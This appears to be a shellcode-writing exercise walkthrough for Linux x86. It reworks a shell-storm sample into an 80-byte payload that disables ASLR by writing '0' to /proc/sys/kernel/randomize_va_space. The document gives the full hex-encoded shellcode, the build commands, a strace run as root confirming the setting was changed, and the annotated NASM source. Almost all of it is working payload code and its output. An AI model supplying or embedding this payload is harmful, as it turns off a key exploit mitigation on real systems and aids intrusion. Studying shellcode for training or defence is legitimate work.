Copy to another file
$ cp asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop.asm asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt.asm
Create the shellcode from the binary and paste the output into the C template
$ ../convert_bin_sc.sh asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt
"\x31\xc0\x89\xc1\x89\xc2\xeb\x20\x5b\x66\xb9\xbc\x02\xb0\x08\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31\xd2\x66\x42\xb0\x04\xcd\x80\x89\xd0\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65"
Compile the file as C
$ ../compile_c.sh asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c
[+] Compiling ...
[+] Done!
Make sure ASLR is enabled
# echo 1 > /proc/sys/kernel/randomize_va_space
# cat /proc/sys/kernel/randomize_va_space
1
Run it as root and check the output and the length
Although some modifications were made, the final length of the shellcode is 80 bytes, three bytes shorter than the original 83 bytes.
# strace ./asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c
execve("./asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt_c", ["./asm_linx86_aslr-disable_shells"...], [/* 22 vars */]) = 0
brk(0) = 0x804b000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7755000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74313, ...}) = 0
mmap2(NULL, 74313, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7742000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\226\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1730024, ...}) = 0
mmap2(NULL, 1743580, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7598000
mprotect(0xb773b000, 4096, PROT_NONE) = 0
mmap2(0xb773c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a3) = 0xb773c000
mmap2(0xb773f000, 10972, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb773f000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7597000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7597900, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb773c000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb7778000, 4096, PROT_READ) = 0
munmap(0xb7742000, 74313) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7754000
write(1, "Shellcode Length: 80\n", 22Shellcode Length: 80
) = 22
creat("/proc/sys/kernel/randomize_va_space", 01274) = 3
write(3, "0", 1) = 1
_exit(3) = ?
# cat /proc/sys/kernel/randomize_va_space
0
asm_linx86_aslr-disable_shellstorm_sample2-alt_jmpcallpop-opt.asm
global _start
section .text
; NASM syntax, Linux i386, int 0x80 ABI: eax = syscall number,
; arguments in ebx, ecx, edx; return value in eax (negative = -errno).
; Flow: creat(path, mode) -> write(fd, "0", 1) -> exit(fd).
; The path string is placed after the code and its address is
; obtained with the jmp/call/pop trick, so no absolute address is
; encoded and the backward call has no zero bytes in its rel32.
_start:
; Clear registers (ecx, edx are zeroed via eax; ebx is set later by pop)
xor eax,eax
; mov ebx, eax ; Value gets popped via jmp/pop/call
mov ecx, eax
mov edx, eax
; sys_creat
; int creat(const char *pathname, mode_t mode);
; push eax ; Terminate string with NULL --> not required
jmp string ; Jump forward to the call that pushes the string address
append:
pop ebx ; ebx = address of SomeString (the return address pushed by "call append") = pathname
; mov ebx,esp ; Copy stackpointer to stringvalue in EBX for pathname argument
mov cx,0x2bc ; mode = 0x2bc = 700 decimal = 01274 octal (see the strace: creat(..., 01274)).
             ; NOTE(review): this is NOT S_IRWXU, which is 0700 octal = 0x1c0 = 448 decimal.
             ; Presumably harmless here because the procfs node already exists and the
             ; mode is only used when a file is created -- confirm if reused elsewhere.
mov al,0x8 ; sys_creat = 8 (eax was zeroed above, so only the low byte is set)
int 0x80 ; eax = fd on success, -errno on failure (e.g. not root); no error check follows
; sys_write
; ssize_t write(int fd, const void *buf, size_t count);
mov ebx,eax ; ebx = fd from creat (arg 1 of write; also ends up as the exit status below)
push eax ; NOTE(review): this pushed fd is never read back; the write buffer is only the word pushed next
mov dx,0x3a30 ; little-endian bytes '0' (0x30) then ':' (0x3a); only the first byte gets written
push dx ; 2-byte push: esp now points at the '0' byte
mov ecx,esp ; ecx = buf = esp (points at '0')
xor edx,edx ; Clear edx (it still held 0x3a30)
; mov dx, 0x1 ; Set to 1 for size argument
inc dx ; edx = count = 1
mov al,0x4 ; sys_write = 4 (al only; eax holds the fd but its high bytes are 0 for a small fd)
int 0x80 ; write(fd, "0", 1) -> the strace shows write(3, "0", 1) = 1
; sys_close
; int close(int fd);
; mov al,0x6 ; Close call
; int 0x80 ; syscall, returns zero into EAX
; sys_exit
; xor eax, eax ; Clear register
; inc eax ; Increment for 1
mov eax, edx ; edx is still 1 -> sys_exit = 1 (saves the xor/inc pair)
int 0x80 ; exit(ebx): status is the fd, hence _exit(3) in the strace
string:
call append ; Pushes the address of SomeString as the return address and jumps back to append
SomeString: db "/proc/sys/kernel/randomize_va_space" ; no terminating NUL in the db; the C template's
                                                      ; string literal supplies it (the strace shows the
                                                      ; full path), so this relies on the byte after the
                                                      ; string being zero wherever the code is placed